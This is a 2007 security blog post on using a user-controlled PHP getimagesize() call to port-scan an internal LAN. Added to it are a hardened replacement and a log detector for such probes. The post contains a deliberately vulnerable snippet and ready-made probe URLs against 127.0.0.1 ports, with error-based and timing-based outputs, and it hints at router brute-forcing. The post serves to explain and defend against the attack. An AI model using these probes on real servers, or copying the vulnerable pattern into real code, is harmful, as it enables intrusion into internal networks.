Security Thoughts
Wednesday, August 29, 2007, 17:24
Scanning an internal LAN with PHP remote file opening.
Even if some websites are still vulnerable to remote file inclusion (RFI), this is becoming a rather rare scenario.
Much more often, though, one of the PHP functions that accept the http:// or ftp:// stream wrappers is exposed to user control.
A perfect example of this technique is a fully user-controlled getimagesize() call with allow_url_fopen enabled.
No RFI, no data returned: at first sight it could only be used for DoS.
<?php
// Deliberately vulnerable: the URL passed to getimagesize() is fully user-controlled
// and, with allow_url_fopen=On, may point at any http:// or ftp:// host and port.
getimagesize($_GET['image']);
...
?>
Obviously there's no RFI, and until yesterday probably nobody would bother to check, inspect or exploit it. This article shows that some kind of attack can still be accomplished:
LAN scanning and drive-by pharming by error matching or timing analysis.
If PHP error display is set to On, a simple request like:
http://victim.ltd/flawed.php?image=http://127.0.0.1:22/check
will display:
Warning: getimagesize(http://127.0.0.1:22/check): failed to open stream:
Connection refused in...
This means the port is closed.
An open port, on the other hand, is reported as:
Warning: getimagesize(http://127.0.0.1:22): failed to open stream:
HTTP request failed!...
The ftp:// wrapper could obviously be used, too.
If no error is displayed, a timing attack can be carried out instead.
In fact, the timing gives the result away when a port is closed:
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check
real 0m0.057s
user 0m0.032s
sys 0m0.020s
Or when a port is open:
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check
real 0m5.095s
user 0m0.032s
sys 0m0.020s
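The two variants above (error text and response time) both come from handing the raw URL to a stream wrapper. The following hardened replacement for the snippet at the top of the post is an added example, not code from the post or from Wisec; the function names isPublicIp() and fetchImageSizeSafely() are mine. It validates the scheme and port, resolves the host once and rejects loopback, private and link-local addresses, then fetches the body with curl restricted to http/https, without following redirects, with short timeouts and a size cap, and only runs getimagesize() on the local temporary copy.

```php
<?php
// Added example (not from the original post): hardened replacement for
// getimagesize($_GET['image']). Fails closed on anything that is not a
// public http(s) URL on port 80/443.

function isPublicIp(string $ip): bool {
    // FILTER_FLAG_NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16, fc00::/7;
    // FILTER_FLAG_NO_RES_RANGE rejects 0/8, 127/8, 169.254/16, 240/4, ::1, ...
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

function fetchImageSizeSafely(string $url, int $maxBytes = 2000000): ?array {
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;                      // no ftp://, file://, php://, data:// ...
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if ($port !== 80 && $port !== 443) {
        return null;                      // rules out the :22 / :3306 style probes
    }
    $host = strtolower($parts['host']);
    // Resolve once (gethostbyname is IPv4-only; an unresolvable or bracketed IPv6
    // host comes back unchanged and fails the public-IP check below).
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : gethostbyname($host);
    if (!isPublicIp($ip)) {
        return null;
    }

    $tmp = tempnam(sys_get_temp_dir(), 'img');
    $fh  = fopen($tmp, 'wb');
    $ch  = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_PROTOCOLS        => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION   => false, // a redirect to 127.0.0.1 must not be followed
        CURLOPT_CONNECTTIMEOUT   => 3,
        CURLOPT_TIMEOUT          => 5,
        // Pin the address that passed validation, so a DNS rebind between the
        // check and the fetch cannot swap in an internal IP.
        CURLOPT_RESOLVE          => ["$host:$port:$ip"],
        CURLOPT_FILE             => $fh,
        CURLOPT_NOPROGRESS       => false,
        CURLOPT_PROGRESSFUNCTION => function ($ch, $dlTotal, $dlNow) use ($maxBytes) {
            return $dlNow > $maxBytes ? 1 : 0; // non-zero aborts the transfer
        },
    ]);
    $ok = curl_exec($ch) && curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200;
    curl_close($ch);
    fclose($fh);

    // The @ keeps getimagesize() from emitting the warnings the post relies on;
    // display_errors should be Off in production regardless.
    $size = $ok ? @getimagesize($tmp) : false;
    unlink($tmp);
    return $size === false ? null : $size;
}

// Usage: var_dump(fetchImageSizeSafely($_GET['image'] ?? ''));
```

The port restriction is a design choice for this example: where images legitimately live on other ports, replace it with an allowlist of hosts rather than opening the port check back up. Note that every rejection returns null in the same way and without touching the network, so the rejected cases leak neither an error string nor a timing difference.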
----
So, what can be done?
If the right conditions are satisfied:
1. Drive By Pharming
2. Brute-forcing routers.
3. Full LAN scan.
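All three outcomes start from the same request shape: a URL-valued parameter whose target is a loopback, private or link-local address, a non-http scheme, or an unusual port. The triage script below is an added example, not part of the post; the access-log lines it scans are constructed for the demo and the functions isInternalHost() and findSsrfProbes() are mine. It flags each suspicious parameter together with the reason, which works for the timing variant as well as the error-based one since both leave identical requests in the log.

```php
<?php
// Added example (not from the original post): flag requests whose query-string
// parameters carry URLs aimed at internal hosts, odd schemes or odd ports.

// Constructed sample access-log lines (combined log format).
const SAMPLE_LOG = [
    '203.0.113.5 - - [29/Aug/2007:17:24:01 +0200] "GET /flawed.php?image=http://127.0.0.1:22/check HTTP/1.1" 200 312',
    '203.0.113.5 - - [29/Aug/2007:17:24:02 +0200] "GET /flawed.php?image=ftp://192.168.1.1:3306/check HTTP/1.1" 200 312',
    '198.51.100.9 - - [29/Aug/2007:17:25:10 +0200] "GET /flawed.php?image=http://images.example.net/logo.png HTTP/1.1" 200 8812',
    '198.51.100.9 - - [29/Aug/2007:17:25:11 +0200] "GET /index.php HTTP/1.1" 200 1024',
];

function isInternalHost(string $host): bool {
    $host = trim($host, '[]');                      // bracketed IPv6 literal
    if (strtolower($host) === 'localhost') return true;
    if (filter_var($host, FILTER_VALIDATE_IP) === false) {
        return false;                               // hostname: not decidable offline
    }
    return filter_var($host, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false;
}

// Returns one finding per suspicious parameter: request target, parameter name, reasons.
function findSsrfProbes(array $lines): array {
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP/', $line, $m)) continue;
        $query = parse_url($m[1], PHP_URL_QUERY);
        if ($query === null || $query === false) continue;
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (!is_string($value)) continue;
            $u = parse_url($value);
            if ($u === false || !isset($u['scheme'], $u['host'])) continue;
            $reasons = [];
            $scheme = strtolower($u['scheme']);
            if ($scheme !== 'http' && $scheme !== 'https') $reasons[] = "scheme $scheme";
            if (isInternalHost($u['host']))            $reasons[] = "internal host {$u['host']}";
            if (isset($u['port']) && !in_array($u['port'], [80, 443], true)) {
                $reasons[] = "port {$u['port']}";
            }
            if ($reasons) {
                $findings[] = ['request' => $m[1], 'param' => $name, 'reasons' => $reasons];
            }
        }
    }
    return $findings;
}

foreach (findSsrfProbes(SAMPLE_LOG) as $f) {
    printf("%s param=%s: %s\n", $f['request'], $f['param'], implode(', ', $f['reasons']));
}
```

On the sample lines the first two requests are flagged (port 22 on 127.0.0.1, and ftp scheme plus port 3306 on 192.168.1.1) and the last two are not. Hostnames are deliberately left undecided here because resolving them from a log-analysis box would itself generate lookups; in practice, counting distinct target ports per source address over a short window is the cheapest way to separate a scan from a single odd request.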
Lastly, Ascii wrote a nice PHP script for LAN scanning.
You can find it here...
Ah... did I mention that PHP remote file opening supports HTTP Basic Authentication? :)
As usual, the next move is up to you.
Wisec is written and maintained by Stefano Di Paola.